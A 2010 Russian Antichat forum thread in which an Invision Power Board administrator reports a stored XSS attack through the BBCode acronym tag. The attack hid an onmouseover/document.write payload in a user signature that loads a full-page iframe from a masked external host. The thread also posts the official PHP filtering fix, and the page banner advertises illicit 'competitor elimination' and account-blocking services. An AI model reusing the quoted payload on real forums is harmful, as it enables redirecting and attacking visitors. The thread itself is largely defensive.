Форум АНТИЧАТ - Пытаются ломануть через тег ipb

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Пытаются ломануть через тег ipb

Опции темы

Поиск в этой теме

Опции просмотра

Пытаются ломануть через тег ipb

07.03.2010, 14:41

goha

Новичок

Регистрация: 16.11.2009

Сообщений: 6

Провел на форуме:
30843

Репутация: 0

Пытаются ломануть через тег ipb

Есть форум ipb 2 3 6

один пользователь прислал в ЛС некое сообщение, при прокрутке скролом страницы перекинуло на другой сайт и вернуло обратно. В подписи юзера оказался следующий код

Код HTML:

[color="#EEF2F7"][acronym=test1[acronym=test2 onmouseover=document.write("\x3Ciframe\x20src=http://****.freehostia.com/\x20frameborder=0\x20width=1024\x20height=3186\x20scrolling=no\x3E\x3C/iframe\x3E");document.close(); ]_]___________________________________________________________________________[/acronym]_[/acronym][/color]

вот как работает тег акронима:

Код:

[acronym='Laugh Out Loud']lol[/acronym]


<acronym title='{option}'>{content}</acronym>

Как защититься и что делать?

Последний раз редактировалось goha; 30.03.2010 в 19:06..

07.03.2010, 15:19

goha

Новичок

Регистрация: 16.11.2009

Сообщений: 6

Провел на форуме:
30843

Репутация: 0

вот похоже

http://forum.antichat.ru/threadnav10119-1-10.html

похожий способ взлома

Напишите кто знает как это в ipb прикрыть

07.03.2010, 17:30

POS_troi

Познавший АНТИЧАТ

Регистрация: 01.12.2006

Сообщений: 1,769

Провел на форуме:
3718311

Репутация: 1118

Отправить сообщение для POS_troi с помощью ICQ

добавь фильтрацию параметров - передаваемых в acronym

07.03.2010, 23:04

goha

Новичок

Регистрация: 16.11.2009

Сообщений: 6

Провел на форуме:
30843

Репутация: 0

Мозг вещь хорошая но еще нужны знания, у меня их нет чтобы баг фиксануть

http://forums.ibresource.ru/index.php?showtopic=60138

Вон, как показывает практика уязвимы все двойки ipb, я думаю баг знающие люди найдут способ и к тройке применить

08.03.2010, 19:56

goha

Новичок

Регистрация: 16.11.2009

Сообщений: 6

Провел на форуме:
30843

Репутация: 0

Официальный фикс xss с акронимом в 2.3.6

Изменения

sources/classes/bbcode/class_bbcode_core.php

найти

Код:

# XSS Check: Bug ID: 980
							if ( $row['bbcode_tag'] == 'post' OR $row['bbcode_tag'] == 'topic' OR $row['bbcode_tag'] == 'snapback' )
							{
								$match[ $_option ][$i] = intval( $match[ $_option ][$i] );
							}

Добавить ниже

Код:

							# XSS acronym
							if ( $row['bbcode_tag'] == 'acronym' )
							{
								$match[ $_option ][$i]  = preg_replace( "/s((\\\|\)*)t((\\\|\)*)y((\\\|\)*)l((\\\|\)*)e((\\\|\)*)=/is", "st yle=", $match[ $_option ][$i] );
								$match[ $_option ][$i]  = str_replace( array( ':', ';' ), '', $match[ $_option ][$i] );
								$match[ $_content ][$i] = preg_replace( "/s((\\\|\)*)t((\\\|\)*)y((\\\|\)*)l((\\\|\)*)e((\\\|\)*)=/is", "st yle=", $match[ $_content ][$i] );
								$match[ $_content ][$i] = str_replace( array( ':', ';' ), '', $match[ $_content ][$i] );
							}

И это все.

09.04.2010, 21:22

Totgeliebt

Познающий

Регистрация: 20.10.2009

Сообщений: 38

Провел на форуме:
125847

Репутация: 5

кто разобрался как ява скрипт через эту XSS произвести?

09.04.2010, 23:05

warlok

Постоянный

Регистрация: 18.02.2008

Сообщений: 368

Провел на форуме:
4075418

Репутация: 386

Цитата:

Сообщение от Totgeliebt

кто разобрался как ява скрипт через эту XSS произвести?

http://forum.antichat.ru/showthread.php?p=997624

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Как можно просмотреть ник через id в IPB 1.3 final?	Debra	Форумы	19	08.03.2007 21:51
Получение шела через Cgi приложения	k00p3r	Чужие Статьи	0	08.06.2005 15:04
Как можно загрузить шелл в ipb через смайлики?	dyx	Форумы	3	14.05.2005 14:04
Залить шелл через подделку http запросов, на примере ipb 1.3	SURRENDER	Форумы	25	13.04.2005 15:37
Как залить шелл через IPB форум, при отсутствии ftp?	bbmz	Форумы	1	26.11.2004 18:15

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход